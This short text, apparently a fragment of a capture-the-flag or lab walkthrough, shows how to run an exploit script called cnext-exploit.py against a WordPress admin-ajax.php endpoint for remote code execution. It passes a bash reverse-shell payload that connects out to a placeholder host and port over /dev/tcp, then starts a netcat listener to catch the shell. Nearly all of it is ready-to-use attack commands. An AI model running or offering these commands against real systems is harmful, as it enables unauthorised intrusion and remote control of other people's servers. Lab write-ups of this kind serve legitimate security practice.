This exploit script targets the admin-ajax.php
endpoint on WordPress to achieve remote code execution.
python3 cnext-exploit.py 'http://blog.bigbang.com/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
Set up a listener to catch the reverse shell:
nc -lvnp port